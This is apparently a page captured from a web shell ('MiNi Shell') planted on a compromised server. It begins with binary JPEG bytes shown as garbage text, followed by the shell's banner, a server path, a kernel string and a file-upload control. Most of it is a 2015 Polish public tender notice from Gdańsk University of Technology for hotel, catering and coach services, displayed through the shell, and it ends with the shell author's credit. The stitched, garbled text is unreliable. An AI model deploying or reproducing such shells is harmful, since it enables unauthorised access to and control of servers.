JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20151124/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20151124/316548-N-2015.html

<p class="kh_header"><b>Gdańsk: Świadczenie usług hotelarskich, gastronomicznych, wynajmu sal konferencyjnych z wyposażeniem oraz świadczenie usługi wynajmu autokarów wraz z kierowcą na potrzeby szkoleń organizowanych przez Wydział Zarządzania i Ekonomii Politechniki Gdańskiej - ZP/379/018/U/15</b><br>
<b>Numer ogłoszenia: 316548 - 2015; data zamieszczenia: 24.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Gdańska Wydział Zarządzania i Ekonomii , ul. Narutowicza 11/12, 80-233 Gdańsk, woj. pomorskie, tel. +48 58 348 60 20, faks +48 58 347 24 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pg.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług hotelarskich, gastronomicznych, wynajmu sal konferencyjnych z wyposażeniem oraz świadczenie usługi wynajmu autokarów wraz z kierowcą na potrzeby szkoleń organizowanych przez Wydział Zarządzania i Ekonomii Politechniki Gdańskiej - ZP/379/018/U/15.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług hotelarskich, gastronomicznych, wynajmu sal konferencyjnych oraz świadczenie usługi wynajmu autokaru wraz z kierowcą na potrzeby szkoleń organizowanych przez Wydział Zarządzania i Ekonomii Politechniki Gdańskiej.
2. Wymagania dotyczące obiektu hotel świadczący usługi o charakterze stałym, o standardzie minimum trzygwiazdkowym, zgodnie z rozporządzeniem Ministra Gospodarki i Pracy z dnia 19.08.2004 r. w sprawie obiektów hotelarskich i innych obiektów oraz ujętym w Centralnym Wykazie Obiektów Hotelarskich prowadzonym przez Ministerstwo Sportu i Turystyki. Hotel posiadający basen, zaplecze fitness oraz bowling min dwu torowy.
Położenie hotelu Polska, województwo pomorskie, ale poza granicami administracyjnymi  trójmiasta  w odległości od budynku   Wydziału   Zarządzania   i  Ekonomii  Politechniki  Gdańskiej   z   siedzibą   przy ul. Traugutta 79 nie większej niż 40 km, odległość ustalana będzie na podstawie serwisu internetowego mapy Google w dniu otwarcia ofert.
Wykonawca w ramach świadczonej usługi umożliwi bezpłatnie uczestnikom konferencji korzystanie z zaplecza fitness i basenu hotelowego.
Wykonawca zapewnia nocleg dla 38 osób w pokojach dwuosobowych typu twin lub trzyosobowych typu twin
3. Termin realizacji: 18 - 19 grudnia 2015 r.
4. Wykonawca zapewni transport autokarem z kierowcą dla 38 osób z Wydziału Zarządzania i Ekonomii Politechniki Gdańskiej na ul. Traugutta 79, do miejsca gdzie Wykonawca będzie organizował szkolenie i po zakończeniu z powrotem na Wydział Zarządzania i Ekonomii Politechniki Gdańskiej na ul. Traugutta 79. Wykonawca o godzinie 10:00 w dniu18 grudnia 2015 roku podstawi autokar pod budynek Wydziału Zarządzania i Ekonomii Politechniki Gdańskiej na ul. Traugutta 79. Wykonawca w dniu 19.12.2015 roku o godzinie 12:00 zapewni transport do siedziby Wydziału Zarządzania i Ekonomii Politechniki Gdańskiej przy ul. Traugutta 79.
5. Zapewnienie uczestnikom zakwaterowania, jeden nocleg w dniu 18.12.2015 od godziny 12:00 (doba hotelowa) zgodnie z formularzem rzeczowo-cenowym załącznik nr 1a do SIWZ
Wykonawca zapewnia nocleg dla 36 osób w pokojach dwuosobowych typu twin lub trzyosobowych typu twin:
a) 9 pokoi dwuosobowych
b) 6 pokoi trzyosobowych
6. Początek szkolenia: 18 grudnia 2015 r., ok. godz. 12:30
7. Zakończenie usługi: 19 grudnia 2015 r., ok. godz. 12:00 Wykonawca umożliwia opuszczenie pokoi do godziny 12:00
8. Zapewnienie 3 sal konferencyjnych wraz ze sprzętem multimedialnym (rzutnik, flipchart, wifi, nagłośnienie, mikrofony) w dniach 18 grudnia 2015 roku od godziny 12:30. 
9. Przerwa  kawowa  podczas szkolenia ma składać  się  z:  kawy typu Lavazza,  mleka, herbaty typu Lipton, cukru, cytryny, wody gazowanej, wody niegazowanej, soków 100%, ciasteczek.
10. Lunch serwowany w dniu 18 grudnia 2015 dla 38 osób o godzinie 14:00: 
Zestaw I
Krem z pomidorów (200 ml)
Sola z borowikami (120 g) z ziemniakami z wody (200 g) z  zestawem surówek (100g) 
Napoje
Woda z miętą i cytryną,  sok 100% (1/2 litra na osobę)
Zestaw II
Bogracz węgierski z kluseczkami (200 ml)
Devolay (120 g)  z zapiekanymi ziemniakami (200 g)  z  zestawem surówek (100g)
Woda z miętą i cytryną,  sok 100% (1/2 litra na osobę)
Zestaw III
Żurek (200 ml)
Szynka pieczona (120 g)   z sosem myśliwskim z ziemniakami z wody (200 g)   z  zestawem surówek (100g)
Woda z miętą i cytryną,  sok 100% (1/2 litra na osobę)
Ilości do poszczególnych zestawów zostaną podane na 4 dni robocze przed usługą.
11. Wykonawca od godziny 17:00 do 19:00 zapewni min. dwa tory kręgielni, podczas rozgrywek podane zostaną ciasta domowe po 200 g/osobę dwa rodzaje sernik i szarlotka, paluszki typu lajkonik po 50 g/osobę (w formie stołu szwedzkiego dostępne przy bowling).
12. Kolacja w dniu 18 grudnia 2015 dla 38 osób o godzinie 20:00 w sali z dostępem do parkietu i muzyka DJ:
Serwowana
Zupa krem z pieczarek (200 ml)
Rolada z szynką (120 g) z frytkami (200 g) z surówkami (100g)  
Filet z łososia (120 g) na maśle z ryżem (200 g) z warzywami gotowanymi (100g)  
Ilości zostaną podane na 4 dni robocze przed usługą.
Stół szwedzki
Sałatka z kurczakiem (50 g) - 20 porcji
Naleśniki z łososiem i mascarpone (50 g)  - 20 porcji
Sandacz w galarecie (50 g) - 24 porcji
Jajko w szynce z sałatką (50 g) - 20 porcji
Roladki z polędwiczki z serem pleśniowym (50 g) - 20 porcji
Roladki drobiowe zawijane w boczku (50 g) - 20 porcji
Pstrąg w galarecie (50 g) - 20 porcji 
Talerz z wędlinami (karkówka, szynka, schab) (50 g) - 10 porcji
Smalec domowy - 48 porcji
Ogórki kiszone - 48 porcji
Pieczywo i masło- 48 porcji
Woda mineralna - 20 butelek 0,5 litra
Sok jabłkowy 100% - 10 litrów
Sok pomarańczowy 100% - 10 litrów
Kawy typu Lavazza,  mleko, herbata typu Lipton, cukier, cytryna - bez ograniczeń
13. Wykonawca zapewni DJ w sali, w której będzie serwowana kolacja, sala z parkietem do tańczenia.
14. ZAMAWIAJĄCY zastrzega sobie prawo do niezrealizowania przedmiotu umowy w całości, tj. w ilościach podanych w formularzu rzeczowo - cenowym stanowiącym załącznik nr 1a do SIWZ, a WYKONAWCY w takim przypadku nie będzie przysługiwało żadne roszczenie z tego tytułu, jak również nie będzie on uprawniony do żądania zapłaty wynagrodzenia za niezrealizowaną część usługi.
15. ZAMAWIAJĄCY zastrzega sobie prawo do zwiększenia lub zmniejszenia przedmiotu umowy o 20% ilości podanych w formularzu rzeczowo - cenowym stanowiącym załącznik nr 1a do SIWZ.
16. Ostateczna liczba uczestników konferencji zostanie podana najpóźniej 4 dni kalendarzowe przed rozpoczęciem konferencji.
17. Wykonawca zapewni obsługę kelnerską..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.12.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 18.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że posiada licencję na wykonywanie krajowego transportu osób wydaną przed dniem 15.08.2013 r. na podstawie art. 5 ust. 1 ustawy z dnia 06.09.2001 r. o transporcie drogowym, (t.j. Dz. U. z 2012 r. poz. 1265 oraz z 2013 r. poz. 21) lub zezwolenie na wykonywanie zawodu przewoźnika drogowego wydane po dniu 15.08.2013 r. na podstawie i zasadach określonych w art. 5 ust. 1 ustawy z dnia 06.09.2001 r. o transporcie drogowym (t.j. Dz. U. z 2013 r., poz. 1414 z późn. zm.) i rozporządzeniu Parlamentu Europejskiego i Rady (WE) nr 1071/2009 ustanawiającym wspólne zasady dotyczące warunków wykonywania zawodu przewoźnika drogowego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że zrealizował należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum dwie usługi dotyczące organizacji szkolenia wraz z bazą noclegową oraz gastronomiczną  na min. 40 osób na kwotę nie mniejsza niż 15 000 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Doświadczenie zawodowe - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzp.pg.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POLITECHNIKA GDAŃSKA Wydział Zarządzania i Ekonomii, ul. G. Narutowicza 11/12 (siedziba: ul. Traugutta 79), 80-233 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2015 godzina 09:30, miejsce: POLITECHNIKA GDAŃSKA Wydział Zarządzania i Ekonomii, ul. G. Narutowicza 11/12 (siedziba: ul. Traugutta 79), 80-233 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com